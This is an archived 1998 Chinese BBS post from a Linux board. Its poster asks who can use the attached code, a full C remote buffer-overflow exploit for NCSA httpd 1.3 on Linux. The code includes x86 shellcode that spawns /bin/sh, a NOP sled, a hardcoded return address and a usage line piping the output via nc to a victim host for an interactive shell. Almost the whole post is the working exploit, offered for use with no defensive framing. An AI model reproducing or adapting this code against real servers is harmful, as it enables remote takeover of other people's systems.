📄 00000044.htm
字号:
<HTML><HEAD> <TITLE>BBS水木清华站∶精华区</TITLE></HEAD><BODY><CENTER><H1>BBS水木清华站∶精华区</H1></CENTER>发信人: tjb (老六), 信区: Linux <BR>标 题: 谁会用这个 <BR>发信站: BBS 水木清华站 (Fri Jul 10 20:57:02 1998) <BR> <BR> <BR>可以获得remote exploit <BR>/* <BR> * NCSA 1.3 Linux/intel remote xploit by <A HREF="mailto:savage@apostols.org">savage@apostols.org</A> 1997-April-23 <BR> * <BR> * Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore,EDevil and the rest of T <BR>oXyn !!! <BR> * <BR> * usage: <BR> * $ (hackttpd 0; cat) | nc victim 143 <BR> * | <BR> * +--> usually from -1000 to 1000 (try steeps of 100) <BR> */ <BR> <BR>#include <stdio.h> <BR> <BR>unsigned char shell[] = { <BR>'/',0x90,0x90,0x90, <BR>0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, <BR>0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, <BR>0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, <BR>0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, <BR>0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, <BR>0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, <BR>0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, <BR>0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, <BR>0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, <BR>0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, <BR>0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, <BR>0xeb,0x27,0x5e,0x31,0xed,0x31,0xc9,0x31,0xc0,0x88,0x6e,6,0x89,0xf3,0x89,0x76, <BR>0x24,0x89,0x6e,0x28,0x8d,0x6e,0x24,0x89,0xe9,0x8d,0x6e,0x28,0x89,0xea,0xb0,0x0b, <BR>0xcd,0x80,0x31,0xdb,0x89,0xd8,0x40,0xcd,0x80,0xe8,0xd4,0xff,0xff,0xff, <BR>'b','i','n','/','s','h' <BR>}; <BR> <BR>char username[256+8]; <BR> <BR>void main(int argc, char *argv[]) { <BR> int i,a; <BR> long val; <BR> <BR> if(argc>1) <BR> a=atoi(argv[1]); <BR> else <BR> a=0; <BR> <BR> strcpy(username,shell); <BR> <BR> for(i=strlen(shell);i<sizeof(username);i++) <BR> username[i]=0x90; /* NOP */ <BR> <BR> val = 0xbfff537c + 4 + a; <BR> <BR> i=sizeof(username)-4; <BR> { <BR> username[i+0] = val & 0x000000ff; <BR> username[i+1] = (val & 0x0000ff00) >> 8; <BR> username[i+2] = (val & 0x00ff0000) >> 16; <BR> username[i+3] = (val & 0xff000000) >> 24; <BR> } <BR> username[ sizeof(username) ] = 0; <BR> <BR> printf("GET %s\n/bin/bash -i 2>&1;\n", username); <BR>} <BR>说是对付1.3.0的httpd <BR>-- <BR> <BR> 一壶浊酒喜相逢 <BR> 古今多少事均赋笑谈中 <BR> <BR> <BR> <BR>※ 修改:·tjb 於 Jul 10 20:59:54 修改本文·[FROM: 202.200.37.100] <BR>※ 来源:·BBS 水木清华站 bbs.net.tsinghua.edu.cn·[FROM: 202.200.37.100] <BR><CENTER><H1>BBS水木清华站∶精华区</H1></CENTER></BODY></HTML>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -